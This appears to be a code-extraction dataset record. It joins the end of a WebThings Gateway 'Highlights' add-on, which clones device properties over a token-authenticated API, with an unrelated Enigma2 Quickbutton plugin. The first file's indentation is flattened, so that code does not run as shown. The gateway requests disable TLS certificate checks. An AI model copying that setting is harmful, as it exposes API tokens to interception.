#print("full property: " + str(thing['properties'][thing_property_key]))
#print("___type: " + str(thing['properties'][thing_property_key]['type']))
#if '@type' in thing['properties'][thing_property_key]:
# print("___atype: " + str(thing['properties'][thing_property_key]['@type']))
clone_property = thing['properties'][thing_property_key].copy()
clone_property['@type'] = item['property1_atype']
if not clone_property['links'][0]['href'].startswith("/things/highlights-"):
new_href = clone_property['links'][0]['href'].replace("/things/","/things/highlights-")
clone_property['links'][0]['href'] = new_href
new_thing_title = "highlights " + str(item['thing1'])
if 'title' in thing:
new_thing_title = "highlights " + str(thing['title'])
elif 'label' in thing:
new_thing_title = "highlights " + str(thing['label'])
new_thing_id = "highlights-" + str(item['thing1']) + '-' + str(item['property1'])
device = HighlightsDevice(self, self.adapter, new_thing_id, new_thing_title, item['thing1_atype']) # note that it's wrapped in an array
self.adapter.handle_device_added(device)
targetDevice = self.adapter.get_device(new_thing_id)
if targetDevice != None:
if self.DEBUG:
print("Creating cloned property. It's original_value will be: " + str(original_value))
targetDevice.properties[ str(item['property1']) ] = HighlightsProperty(
targetDevice,
str(item['property1']),
clone_property,
original_value,
str(item['thing1']),
str(item['property1']) )
targetProperty = targetDevice.find_property( str(item['property1']) )
self.adapter.handle_device_added(device)
targetProperty.update(original_value)
targetDevice.notify_property_changed(targetProperty)
else:
print("Error: the target device was still None after just creating it.")
except Exception as ex:
print("Error creating new thing: " + str(ex))
try:
if targetDevice != None:
targetProperty = targetDevice.find_property( str(item['property1']) )
if targetProperty != None:
targetProperty.update(original_value)
else:
if self.DEBUG:
print("Error: missing property wasn't created?")
else:
if self.DEBUG:
print("Error: missing device wasn't created?")
except Exception as ex:
print("Error updating property: " + str(ex))
except Exception as ex:
print("Error finding and updating property: " + str(ex))
continue
except Exception as ex:
print("Error putting via API: " + str(ex))
except Exception as ex:
print("Clock error: " + str(ex))
#
# HANDLE REQUEST
#
def handle_request(self, request):
"""
Handle a new API request for this handler.
request -- APIRequest object
"""
try:
if request.method != 'POST':
return APIResponse(status=404)
if request.path == '/init' or request.path == '/update_items':
try:
if request.path == '/init':
if self.DEBUG:
print("Getting the initialisation data")
try:
state = 'ok'
# Check if a token is present
if self.token == None:
state = 'Error: missing API token. Please add one in settings.'
return APIResponse(
status=200,
content_type='application/json',
content=json.dumps({'state' : state, 'items' : self.persistent_data['items']}),
)
except Exception as ex:
print("Error getting init data: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps({'state' : "Internal error: no thing data", 'items' : []}),
)
elif request.path == '/update_items':
try:
self.persistent_data['items'] = request.body['items']
#print("")
# Get all the things via the API.
try:
self.things = self.api_get("/things")
#print("Did the things API call")
except Exception as ex:
print("Error getting updated things data via API: " + str(ex))
# try to get the correct property type (integer/float)
try:
for item in self.persistent_data['items']:
#print("_item: " + str(item))
if 'thing1' in item and 'property1' in item:
try:
for thing in self.things:
thing_id = str(thing['id'].rsplit('/', 1)[-1])
if str(item['thing1']) == thing_id:
#print("__id SPOTTED: " + str(thing_id))
try:
#print("thing = " + str(thing))
potential_atype = None
#print("Thing = " + str(thing))
#if '@type' in thing:
try:
                                                if '@type' in thing:  # thing is a dict -- hasattr() never sees its keys
#print("existing @type spotted in thing")
if len(thing['@type']) == 1:
potential_atype = str(thing['@type'][0])
except Exception as ex:
print("Error checking for @type in thing: " + str(ex))
#print("thing['properties'] = " + str(thing['properties']))
for thing_property_key in thing['properties']:
property_id = thing['properties'][thing_property_key]['links'][0]['href'].rsplit('/', 1)[-1]
if self.DEBUG:
print("property_id = " + str(property_id))
if str(item['property1']) == property_id:
try:
#print("full property: " + str(thing['properties'][thing_property_key]))
done = False
item['property1_type'] = str(thing['properties'][thing_property_key]['type'])
if '@type' in thing['properties'][thing_property_key]:
if potential_atype != None:
# Cloning a property that already has a capability
#print("___atype: " + str(thing['properties'][thing_property_key]['@type']))
item['thing1_atype'] = potential_atype
item['property1_atype'] = str(thing['properties'][thing_property_key]['@type'])
done = True
else:
atype = str(thing['properties'][thing_property_key]['@type'])
if atype == 'AlarmProperty':
item['thing1_atype'] = 'Alarm'
item['property1_atype'] = atype
done = True
elif atype == 'OpenProperty':
item['thing1_atype'] = 'DoorSensor'
item['property1_atype'] = atype
done = True
elif atype == 'LockedProperty':
item['thing1_atype'] = 'Lock'
item['property1_atype'] = atype
done = True
elif atype == 'MotionProperty':
item['thing1_atype'] = 'MotionSensor'
item['property1_atype'] = atype
done = True
#elif atype == 'BrightnessProperty': # doesn't work, creates a boolean
# item['thing1_atype'] = 'Light'
# item['property1_atype'] = atype
# done = True
# Todo: we could look up the corresponding thing @type if a property @type is provided.
if done == False:
# here we figure out a fitting capabiliy if the property doesn't have one yet. This is required for it to show up as the highlighted property.
if item['property1_type'] == 'number' or item['property1_type'] == 'integer':
item['property1_atype'] = 'LevelProperty'
item['thing1_atype'] = 'MultiLevelSensor'
if 'unit' in thing['properties'][thing_property_key]:
if thing['properties'][thing_property_key]['unit'].lower() == 'watt': # or thing['properties'][thing_property_key]['unit'].lower() == 'kwh':
if self.DEBUG:
print("spotted a kwh or watt")
# technically using kwh is wrong here. But hey, I want that icon!
item['property1_atype'] = 'InstantaneousPowerProperty'
item['thing1_atype'] = 'EnergyMonitor'
if item['property1_type'] == 'boolean':
item['property1_atype'] = 'OnOffProperty'
item['thing1_atype'] = 'OnOffSwitch'
if 'readOnly' in thing['properties'][thing_property_key]:
if bool(thing['properties'][thing_property_key]['readOnly']) == True:
item['property1_atype'] = 'BooleanProperty'
item['thing1_atype'] = 'BinarySensor'
if self.DEBUG:
print("item['thing1_atype'] has been deduced as: " + str(item['thing1_atype']))
print("item['property1_atype'] has been deduced as: " + str(item['property1_atype']))
except Exception as ex:
print("Error while analysing properties: " + str(ex))
except Exception as ex:
print("Error while checking for @type in thing: " + str(ex))
except Exception as ex:
print("Error while while looping over things: " + str(ex))
continue
except Exception as ex:
print("Error finding if property should be int or float: " + str(ex))
self.save_persistent_data()
return APIResponse(
status=200,
content_type='application/json',
content=json.dumps({'state' : 'ok'}),
)
except Exception as ex:
print("Error saving updated items: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("Error updating items: " + str(ex)),
)
else:
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("API error"),
)
except Exception as ex:
print("Init issue: " + str(ex))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("Error in API handler"),
)
else:
return APIResponse(status=404)
except Exception as e:
print("Failed to handle UX extension API request: " + str(e))
return APIResponse(
status=500,
content_type='application/json',
content=json.dumps("API Error"),
)
def unload(self):
self.running = False
if self.DEBUG:
print("Highlights api handler shutting down")
#def cancel_pairing(self):
# """Cancel the pairing process."""
# Get all the things via the API.
# try:
# self.things = self.api_get("/things")
# #print("Did the things API call")
# except Exception as ex:
# print("Error, couldn't load things at init: " + str(ex))
#
# API
#
def api_get(self, api_path):
"""Returns data from the WebThings Gateway API."""
if self.DEBUG:
print("GET PATH = " + str(api_path))
#print("GET TOKEN = " + str(self.token))
if self.token == None:
print("PLEASE ENTER YOUR AUTHORIZATION CODE IN THE SETTINGS PAGE")
return []
try:
r = requests.get(self.server + api_path, headers={
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'Bearer ' + str(self.token),
}, verify=False, timeout=5)
#if self.DEBUG:
# print("API GET: " + str(r.status_code) + ", " + str(r.reason))
if r.status_code != 200:
if self.DEBUG:
print("API GET returned a status code that was not 200. It was: " + str(r.status_code))
return {"error": r.status_code}
else:
            #if self.DEBUG:
            #    print("API GET successful: " + str(r.text))
return json.loads(r.text)
except Exception as ex:
print("Error doing " + str(api_path) + " request/loading returned json: " + str(ex))
#return [] # or should this be {} ? Depends on the call perhaps.
return {"error": 500}
def api_put(self, api_path, json_dict):
"""Sends data to the WebThings Gateway API."""
if self.DEBUG:
print("PUT > api_path = " + str(api_path))
print("PUT > json dict = " + str(json_dict))
#print("PUT > self.server = " + str(self.server))
#print("PUT > self.token = " + str(self.token))
headers = {
'Accept': 'application/json',
'Authorization': 'Bearer {}'.format(self.token),
}
try:
r = requests.put(
self.server + api_path,
json=json_dict,
headers=headers,
verify=False,
timeout=3
)
#if self.DEBUG:
#print("API PUT: " + str(r.status_code) + ", " + str(r.reason))
if r.status_code != 200:
#if self.DEBUG:
# print("Error communicating: " + str(r.status_code))
return {"error": str(r.status_code)}
else:
if self.DEBUG:
print("API PUT response: " + str(r.text))
return json.loads(r.text)
except Exception as ex:
print("Error doing http request/loading returned json: " + str(ex))
#return {"error": "I could not connect to the web things gateway"}
#return [] # or should this be {} ? Depends on the call perhaps.
return {"error": 500}
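    # A minimal usage sketch for api_put (assumption: a valid bearer token is
    # already configured). HighlightsProperty.set_value() further below uses the
    # same call shape to push a property change back to the gateway:
    #
    #   data_to_put = {"on": True}  # "on" is a hypothetical property id
    #   result = self.api_put("/things/some-thing-id/properties/on", data_to_put)
    #   if "error" in result:
    #       print("gateway rejected the update: " + str(result["error"]))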
#
# Delete a thing
#
def delete_thing(self, device_id):
if self.DEBUG:
print("Deleting a highlighted thing")
try:
for i in range(len(self.persistent_data['items'])):
if 'thing1' in self.persistent_data['items'][i]:
if str(device_id) == 'highlights-' + str(self.persistent_data['items'][i]['thing1']):
del self.persistent_data['items'][i]
self.save_persistent_data()
break
except Exception as ex:
print("Error removing highligh thing from persistence data: " + str(ex))
#
# SAVE TO PERSISTENCE
#
def save_persistent_data(self):
        if self.DEBUG:
            print("Saving to persistence data store at path: " + str(self.persistence_file_path))
        try:
            if not os.path.isfile(self.persistence_file_path):
                open(self.persistence_file_path, 'a').close()
                if self.DEBUG:
                    print("Created an empty persistence file")
            #else:
            #    if self.DEBUG:
            #        print("Persistence file existed. Will try to save to it.")
            # Open the file once in write mode and hand that handle to json.dump;
            # the original opened the file a second time and never closed the write handle.
            with open(self.persistence_file_path, 'w') as f:
                if self.DEBUG:
                    print("saving persistent data: " + str(self.persistent_data))
                json.dump(self.persistent_data, f)
return True
except Exception as ex:
print("Error: could not store data in persistent store: " + str(ex) )
return False
def get_int_or_float(v):
number_as_float = float(v)
number_as_int = int(number_as_float)
if number_as_float == number_as_int:
return number_as_int
else:
return float( int( number_as_float * 1000) / 1000)
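# A quick illustration of get_int_or_float() (comments only, not executed):
#   get_int_or_float(3.0)     -> 3      (a whole-number float collapses to an int)
#   get_int_or_float(3.14159) -> 3.141  (other floats are truncated to three decimals)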
#
# ADAPTER
#
class HighlightsAdapter(Adapter):
"""Adapter that can hold and manage things"""
def __init__(self, api_handler, verbose=False):
"""
Initialize the object.
verbose -- whether or not to enable verbose logging
"""
self.api_handler = api_handler
self.name = self.api_handler.addon_name #self.__class__.__name__
print("adapter name = " + self.name)
self.adapter_name = self.api_handler.addon_name #'Highlights-adapter'
Adapter.__init__(self, self.adapter_name, self.adapter_name, verbose=verbose)
self.DEBUG = self.api_handler.DEBUG
def remove_thing(self, device_id):
if self.DEBUG:
print("Removing highlight thing: " + str(device_id))
try:
self.api_handler.delete_thing(device_id)
obj = self.get_device(device_id)
self.handle_device_removed(obj) # Remove from device dictionary
except Exception as ex:
print("Could not remove thing from highligh adapter devices: " + str(ex))
#
# DEVICE
#
class HighlightsDevice(Device):
"""Highlight device type."""
def __init__(self, handler, adapter, device_name, device_title, device_type):
"""
Initialize the object.
adapter -- the Adapter managing this device
"""
Device.__init__(self, adapter, device_name)
#print("Creating Highlight thing")
self._id = device_name
self.id = device_name
self.adapter = adapter
self.handler = handler
self._type.append(device_type)
self.name = device_name
self.title = device_title
self.description = 'Highlight device'
#if self.adapter.DEBUG:
#print("Empty Highlight thing has been created. device_name = " + str(self.name))
#print("new thing's adapter = " + str(self.adapter))
#
# PROPERTY
#
class HighlightsProperty(Property):
"""Highlight property type."""
def __init__(self, device, name, description, value, original_thing_id, original_property_id):
Property.__init__(self, device, name, description)
self.original_thing_id = original_thing_id
self.original_property_id = original_property_id
self.device = device
self.name = name
self.title = name
self.description = description # dictionary
self.value = value
self.set_cached_value(value)
self.device.notify_property_changed(self)
def set_value(self, value):
#print("set_value is called on a Highlight property.")
#todo: call the API here using the provided endpoint, in order to sync the values.
try:
data_to_put = { str(self.original_property_id) : value }
#print("data_to_put = " + str(data_to_put))
api_put_result = self.device.handler.api_put( '/things/' + str(self.original_thing_id) + '/properties/' + str(self.original_property_id), data_to_put )
#print("api_put_result = " + str(api_put_result))
except Exception as ex:
print("property:set value:error: " + str(ex))
#pass
def update(self, value):
#print("highlight property -> update to: " + str(value))
#print("--prop details: " + str(self.title) + " - " + str(self.original_property_id))
#print("--pro device: " + str(self.device))
if value != self.value:
self.value = value
self.set_cached_value(value)
self.device.notify_property_changed(self)
|
[
"os.path.expanduser",
"threading.Thread",
"json.load",
"gateway_addon.Adapter.__init__",
"json.loads",
"os.getcwd",
"gateway_addon.APIHandler.__init__",
"gateway_addon.Device.__init__",
"os.path.dirname",
"json.dumps",
"time.sleep",
"os.path.isfile",
"gateway_addon.APIResponse",
"gateway_addon.Property.__init__",
"requests.put",
"os.path.join",
"gateway_addon.Database"
] |
[((37616, 37693), 'gateway_addon.Adapter.__init__', 'Adapter.__init__', (['self', 'self.adapter_name', 'self.adapter_name'], {'verbose': 'verbose'}), '(self, self.adapter_name, self.adapter_name, verbose=verbose)\n', (37632, 37693), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((38509, 38552), 'gateway_addon.Device.__init__', 'Device.__init__', (['self', 'adapter', 'device_name'], {}), '(self, adapter, device_name)\n', (38524, 38552), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((39265, 39315), 'gateway_addon.Property.__init__', 'Property.__init__', (['self', 'device', 'name', 'description'], {}), '(self, device, name, description)\n', (39282, 39315), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((1827, 1906), 'os.path.join', 'os.path.join', (["self.user_profile['dataDir']", 'self.addon_name', '"""persistence.json"""'], {}), "(self.user_profile['dataDir'], self.addon_name, 'persistence.json')\n", (1839, 1906), False, 'import os\n'), ((3908, 3949), 'gateway_addon.APIHandler.__init__', 'APIHandler.__init__', (['self', "manifest['id']"], {}), "(self, manifest['id'])\n", (3927, 3949), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((4628, 4663), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.clock'}), '(target=self.clock)\n', (4644, 4663), False, 'import threading\n'), ((4951, 4976), 'gateway_addon.Database', 'Database', (['self.addon_name'], {}), '(self.addon_name)\n', (4959, 4976), False, 'from gateway_addon import Database\n'), ((6021, 6034), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6031, 6034), False, 'import time\n'), ((34211, 34309), 'requests.put', 'requests.put', (['(self.server + api_path)'], {'json': 'json_dict', 'headers': 'headers', 'verify': '(False)', 'timeout': '(3)'}), '(self.server + api_path, json=json_dict, headers=headers,\n verify=False, timeout=3)\n', (34223, 34309), False, 'import requests\n'), ((2619, 2631), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2628, 2631), False, 'import json\n'), ((3709, 3734), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3724, 3734), False, 'import os\n'), ((3882, 3894), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3891, 3894), False, 'import json\n'), ((16952, 16975), 'gateway_addon.APIResponse', 'APIResponse', ([], {'status': '(404)'}), '(status=404)\n', (16963, 16975), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((31472, 31495), 'gateway_addon.APIResponse', 'APIResponse', ([], {'status': '(404)'}), '(status=404)\n', (31483, 31495), False, 'from gateway_addon import APIHandler, APIResponse, Adapter, Device, Property, Database\n'), ((33404, 33422), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (33414, 33422), False, 'import json\n'), ((34834, 34852), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (34844, 34852), False, 'import json\n'), ((36037, 36079), 'os.path.isfile', 'os.path.isfile', (['self.persistence_file_path'], {}), '(self.persistence_file_path)\n', (36051, 36079), False, 'import os\n'), ((2084, 2107), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2102, 2107), False, 'import os\n'), ((2453, 2464), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2462, 2464), False, 'import os\n'), ((31751, 31774), 'json.dumps', 'json.dumps', (['"""API Error"""'], 
{}), "('API Error')\n", (31761, 31774), False, 'import json\n'), ((31352, 31386), 'json.dumps', 'json.dumps', (['"""Error in API handler"""'], {}), "('Error in API handler')\n", (31362, 31386), False, 'import json\n'), ((17775, 17843), 'json.dumps', 'json.dumps', (["{'state': state, 'items': self.persistent_data['items']}"], {}), "({'state': state, 'items': self.persistent_data['items']})\n", (17785, 17843), False, 'import json\n'), ((30994, 31017), 'json.dumps', 'json.dumps', (['"""API error"""'], {}), "('API error')\n", (31004, 31017), False, 'import json\n'), ((18195, 18262), 'json.dumps', 'json.dumps', (["{'state': 'Internal error: no thing data', 'items': []}"], {}), "({'state': 'Internal error: no thing data', 'items': []})\n", (18205, 18262), False, 'import json\n'), ((30303, 30330), 'json.dumps', 'json.dumps', (["{'state': 'ok'}"], {}), "({'state': 'ok'})\n", (30313, 30330), False, 'import json\n')]
|
# Quickbutton
#
# $Id$
#
# Coded by Dr.Best (c) 2009
# Support: www.dreambox-tools.info
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
from Screens.Screen import Screen
from Screens.ChannelSelection import ChannelSelection
from Plugins.Plugin import PluginDescriptor
from Components.ActionMap import ActionMap, HelpableActionMap
from Components.PluginComponent import plugins
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import ConfigSubsection, ConfigText, configfile, ConfigSelection, getConfigListEntry, ConfigYesNo
from Components.config import config
from Components.Button import Button
from Screens.MessageBox import MessageBox
# for localized messages
from . import _
config.plugins.Quickbutton = ConfigSubsection()
config.plugins.Quickbutton.overwritehbbtvredbutton = ConfigYesNo(default=False)
config.plugins.Quickbutton.red = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.red_b = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.green = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.yellow = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
config.plugins.Quickbutton.blue = ConfigText(default=_("Nothing"), visible_width=50, fixed_size=False)
from Screens.InfoBarGenerics import InfoBarPlugins
baseInfoBarPlugins__init__ = None
ENABLE_RED_BUTTON = False
def getHBBTVInstalled():
try:
from Plugins.Extensions.HbbTV.HbbTV import HbbTV
return config.plugins.hbbtv.enabled.value
except ImportError:
return False
def autostart(reason, **kwargs):
global baseInfoBarPlugins__init__, ENABLE_RED_BUTTON
if "session" in kwargs:
session = kwargs["session"]
if baseInfoBarPlugins__init__ is None:
baseInfoBarPlugins__init__ = InfoBarPlugins.__init__
InfoBarPlugins.__init__ = InfoBarPlugins__init__
InfoBarPlugins.greenlong = greenlong
InfoBarPlugins.yellowlong = yellowlong
InfoBarPlugins.redlong = redlong
InfoBarPlugins.bluelong = bluelong
if config.misc.rcused.value != 1:
ENABLE_RED_BUTTON = True
InfoBarPlugins.red = red
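# The block above is the usual Enigma2 monkey-patch pattern: the original
# InfoBarPlugins.__init__ is stashed exactly once in baseInfoBarPlugins__init__,
# then replaced so every new infobar instance routes through the wrapper below.
# A minimal sketch of the same idea (hypothetical names, comments only):
#   if base_init is None:
#       base_init = SomeClass.__init__  # remember the original only once
#   SomeClass.__init__ = patched_init   # patched_init must end by calling base_init(self)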
def setup(session, **kwargs):
session.open(QuickbuttonSetup)
def Plugins(**kwargs):
	descriptors = [PluginDescriptor(where=PluginDescriptor.WHERE_SESSIONSTART, fnc=autostart)]
	descriptors.append(PluginDescriptor(name="Setup Quickbutton", description=_("setup for Quickbutton"), where=[PluginDescriptor.WHERE_PLUGINMENU], icon="setup_quickbutton.png", fnc=setup))
	return descriptors
def InfoBarPlugins__init__(self):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
x = {"green_l": (self.greenlong, _("Assign plugin to long green key pressed")),
"yellow_l": (self.yellowlong, _("Assign plugin to long yellow key pressed")),
"red_l": (self.redlong, _("Assign plugin to long red key pressed")),
"blue_l": (self.bluelong, _("Assign plugin to long blue key pressed"))}
if ENABLE_RED_BUTTON:
x["red_b"] = (self.red, _("Assign plugin to red key pressed"))
hbbtvinstalled = getHBBTVInstalled()
if config.plugins.Quickbutton.overwritehbbtvredbutton.value and hbbtvinstalled:
self["HbbtvActions"].setEnabled(False)
self["QuickbuttonActions"] = HelpableActionMap(self, "QuickbuttonActions", x)
else:
		InfoBarPlugins.__init__ = baseInfoBarPlugins__init__ # restore the original initializer for non-EPG infobars
InfoBarPlugins.greenlong = None
InfoBarPlugins.yellowlong = None
InfoBarPlugins.redlong = None
InfoBarPlugins.bluelong = None
if ENABLE_RED_BUTTON:
InfoBarPlugins.red = None
baseInfoBarPlugins__init__(self)
def greenlong(self):
startPlugin(self, str(config.plugins.Quickbutton.green.value))
def yellowlong(self):
startPlugin(self, str(config.plugins.Quickbutton.yellow.value))
def redlong(self):
startPlugin(self, str(config.plugins.Quickbutton.red.value))
def bluelong(self):
startPlugin(self, str(config.plugins.Quickbutton.blue.value))
def red(self):
startPlugin(self, str(config.plugins.Quickbutton.red_b.value))
def startPlugin(self, pname):
msgText = _("Unknown Error")
no_plugin = True
if pname != _("Nothing"):
if pname == _("Single EPG"):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
self.openSingleServiceEPG()
no_plugin = False
elif pname == _("Multi EPG"):
from Screens.InfoBarGenerics import InfoBarEPG
if isinstance(self, InfoBarEPG):
self.openMultiServiceEPG()
no_plugin = False
elif pname == _("MediaPlayer"):
			try: # in case it is not installed
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception as e:
msgText = _("Error!\nError Text: %s" % e)
elif pname == _("Plugin browser"):
from Screens.PluginBrowser import PluginBrowser
self.session.open(PluginBrowser)
no_plugin = False
elif pname == _("switch 4:3 content display"):
ar = {"pillarbox": _("Pillarbox"),
"panscan": _("Pan&Scan"),
"scale": _("Just Scale")}
switch = {"pillarbox": "panscan", "panscan": "scale", "scale": "pillarbox"}
config.av.policy_43.value = switch[config.av.policy_43.value]
config.av.policy_43.save()
self.session.open(MessageBox, _("Display 4:3 content as") + " " + ar[config.av.policy_43.value], MessageBox.TYPE_INFO, timeout=3)
no_plugin = False
elif pname == _("Timer"):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
no_plugin = False
elif pname == _("HbbTV Applications"):
try:
from Plugins.Extensions.HbbTV.HbbTV import HbbTV
no_plugin = not config.plugins.hbbtv.enabled.value
except ImportError:
no_plugin = True
finally:
if not no_plugin:
hbbtv_instance = HbbTV.instance
if hbbtv_instance:
hbbtv_instance._showApplicationList()
else:
plugin = None
for p in plugins.getPlugins(where=[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]):
if pname == str(p.name):
plugin = p
if plugin is not None:
try:
self.runPlugin(plugin)
no_plugin = False
except Exception as e:
msgText = _("Error!\nError Text: %s" % e)
else:
msgText = _("Plugin not found!")
else:
msgText = _("No plugin assigned!")
if no_plugin:
self.session.open(MessageBox, msgText, MessageBox.TYPE_INFO)
class QuickbuttonSetup(ConfigListScreen, Screen):
skin = """
<screen position="center,center" size="550,400" title="Quickbutton Setup" >
<widget name="config" position="20,10" size="510,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="0,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_green" position="140,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="0,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="140,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
def __init__(self, session, args=None):
Screen.__init__(self, session)
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self.entryguilist = []
self["setupActions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"cancel": self.keyClose,
"ok": self.keySave,
"left": self.keyLeft,
"right": self.keyRight,
}, -2)
ConfigListScreen.__init__(self, [], session=session)
self.hbbtvinstalled = getHBBTVInstalled()
self.overwriteHBBTVButton = config.plugins.Quickbutton.overwritehbbtvredbutton
self.createSetup("config")
def createSetup(self, widget):
cfglist = []
red_b_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.red_b.value)
red_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.red.value)
green_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.green.value)
yellow_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.yellow.value)
blue_selectedindex = self.getStaticPluginName(config.plugins.Quickbutton.blue.value)
		# fixed presets... this could still be extended; sensible suggestions are still being collected from forums...
self.entryguilist.append(("0", _("Nothing")))
self.entryguilist.append(("1", _("Single EPG")))
self.entryguilist.append(("2", _("Multi EPG")))
self.entryguilist.append(("3", _("MediaPlayer")))
self.entryguilist.append(("4", _("Plugin browser")))
self.entryguilist.append(("5", _("switch 4:3 content display")))
self.entryguilist.append(("6", _("Timer")))
if self.hbbtvinstalled:
self.entryguilist.append(("7", _("HbbTV Applications")))
index = 8
else:
index = 7
		# presets from EXTENSIONSMENU, PLUGINMENU
for p in plugins.getPlugins(where=[PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_PLUGINMENU]):
self.entryguilist.append((str(index), str(p.name)))
if config.plugins.Quickbutton.red.value == str(p.name):
red_selectedindex = str(index)
if config.plugins.Quickbutton.red_b.value == str(p.name):
red_b_selectedindex = str(index)
if config.plugins.Quickbutton.green.value == str(p.name):
green_selectedindex = str(index)
if config.plugins.Quickbutton.yellow.value == str(p.name):
yellow_selectedindex = str(index)
if config.plugins.Quickbutton.blue.value == str(p.name):
blue_selectedindex = str(index)
index = index + 1
self.overwriteHBBTVButtonEntry = None
if self.hbbtvinstalled and ENABLE_RED_BUTTON:
self.overwriteHBBTVButtonEntry = getConfigListEntry(_("Overwrite HBBTV-red-button"), self.overwriteHBBTVButton)
cfglist.append(self.overwriteHBBTVButtonEntry)
self.redchoice = ConfigSelection(default=red_selectedindex, choices=self.entryguilist)
self.greenchoice = ConfigSelection(default=green_selectedindex, choices=self.entryguilist)
self.yellowchoice = ConfigSelection(default=yellow_selectedindex, choices=self.entryguilist)
self.bluechoice = ConfigSelection(default=blue_selectedindex, choices=self.entryguilist)
cfglist.append(getConfigListEntry(_("assigned to long red"), self.redchoice))
cfglist.append(getConfigListEntry(_("assigned to long green"), self.greenchoice))
cfglist.append(getConfigListEntry(_("assigned to long yellow"), self.yellowchoice))
cfglist.append(getConfigListEntry(_("assigned to long blue"), self.bluechoice))
if ENABLE_RED_BUTTON and (self.overwriteHBBTVButton.value or not self.hbbtvinstalled):
self.red_b_choice = ConfigSelection(default=red_b_selectedindex, choices=self.entryguilist)
cfglist.append(getConfigListEntry(_("assigned to red"), self.red_b_choice))
self[widget].list = cfglist
self[widget].l.setList(cfglist)
def getStaticPluginName(self, value):
if value == _("Single EPG"):
return "1"
elif value == _("Multi EPG"):
return "2"
elif value == _("MediaPlayer"):
return "3"
elif value == _("Plugin browser"):
return "4"
elif value == _("switch 4:3 content display"):
return "5"
elif value == _("Timer"):
return "6"
elif value == _("HbbTV Applications"):
return "7"
else:
return "0"
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.newConfig()
def newConfig(self):
cur = self["config"].getCurrent()
if cur and (cur == self.overwriteHBBTVButtonEntry):
self.createSetup("config")
def keySave(self):
config.plugins.Quickbutton.red.value = self.entryguilist[int(self.redchoice.value)][1]
config.plugins.Quickbutton.green.value = self.entryguilist[int(self.greenchoice.value)][1]
config.plugins.Quickbutton.yellow.value = self.entryguilist[int(self.yellowchoice.value)][1]
config.plugins.Quickbutton.blue.value = self.entryguilist[int(self.bluechoice.value)][1]
if ENABLE_RED_BUTTON and (self.overwriteHBBTVButton.value or not self.hbbtvinstalled):
config.plugins.Quickbutton.red_b.value = self.entryguilist[int(self.red_b_choice.value)][1]
self.overwriteHBBTVButton.save()
config.plugins.Quickbutton.save()
configfile.save()
self.close()
def keyClose(self):
self.close()
|
[
"Components.config.ConfigSubsection",
"Components.config.config.plugins.Quickbutton.save",
"Components.ConfigList.ConfigListScreen.keyLeft",
"Screens.Screen.Screen.__init__",
"Plugins.Plugin.PluginDescriptor",
"Components.PluginComponent.plugins.getPlugins",
"Components.ActionMap.HelpableActionMap",
"Components.ConfigList.ConfigListScreen.keyRight",
"Components.config.ConfigYesNo",
"Components.config.ConfigSelection",
"Components.config.config.av.policy_43.save",
"Components.ActionMap.ActionMap",
"Components.ConfigList.ConfigListScreen.__init__",
"Components.config.configfile.save"
] |
